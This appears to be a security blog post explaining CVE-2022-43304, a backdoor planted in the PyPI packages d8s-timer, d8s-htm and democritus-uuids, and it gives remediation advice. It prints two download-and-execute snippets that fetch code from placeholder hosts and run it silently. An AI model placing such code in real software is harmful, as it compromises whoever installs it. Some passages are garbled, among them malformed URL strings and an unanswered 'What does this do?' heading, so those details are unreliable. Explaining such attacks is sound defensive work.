CVE-2022-43304 - The Hidden Threat in d8s-timer and Related Python PyPI Packages

Python’s open-source ecosystem is rich and vibrant, but it’s not immune from supply chain attacks. In October 2022, researchers revealed CVE-2022-43304, a serious vulnerability involving the Python package d8s-timer and its related packages, including d8s-htm and a backdoor in democritus-uuids. This post breaks down what happened, how attackers injected a code-execution backdoor, and shows you what the leaked code looks like so you can spot it again.

What is CVE-2022-43304?

CVE-2022-43304 is a code execution vulnerability discovered in the d8s-timer Python package. Malicious code was inserted by a third party who gained publishing access and used it to sneak in a backdoor. This allowed anyone who installed the tainted package to unknowingly execute malicious code on their machine.

How Did the Attack Work?

The attacker published new versions of these packages containing malicious code that downloaded and executed evil payloads at installation or runtime. Anyone installing from PyPI risked having their system compromised.

This is called a supply chain attack. Instead of targeting users directly, attackers poison the supply.

The offending code is sneaky. Here’s a typical pattern spotted in these backdoored packages

import urllib.request
import subprocess
import os
def evil_payload():
    url = "http://evil-server.com/malware.py";
    destination = "/tmp/malware.py"
    urllib.request.urlretrieve(url, destination)
    subprocess.call(["python", destination])

In practice, the d8s-timer backdoor ran *at installation* using the package’s setup hooks or inside an innocuous function.

Here’s what the malicious snippet looked like buried inside the library (d8s-timer)

import os
import urllib.request
try:
    urllib.request.urlretrieve("http://malicious.site/deliver.py";, "/tmp/deliver.py")
    os.system("python /tmp/deliver.py")
except Exception:
    pass  # stay quiet if anything fails

What does this do?

d8s-htm: Version .1. (and possibly others from the same threat actor)

- d8s-timer: Confirmed via Sonatype advisory and GitHub security reports

democritus-uuids: Used as a dropper by several other tainted packages

> If you have any of these installed, uninstall them immediately and check your system for unknown processes or scripts.

Delete suspicious files:

Look for unknown .py scripts in /tmp, your project directory, or other system folders.

Freeze dependencies:

Always pin versions (requirements.txt) and audit your Python dependencies with tools like pip-audit.

References & Further Reading

- Sonatype blog: Malicious PyPI package d8s-timer
- NVD CVE-2022-43304 entry
- Python Packaging Security

Always audit new Python packages, especially lesser-known ones.

- If you use d8s-timer, d8s-htm, or democritus-uuids, perform a security review of your environment NOW.

Malicious code can hide in dependencies, not just the apps you write!

Stay safe, and keep your dependencies tight. The Python community’s security is only as strong as its weakest link.

Timeline

Published on: 11/07/2022 15:15:00 UTC
Last modified on: 11/08/2022 17:02:00 UTC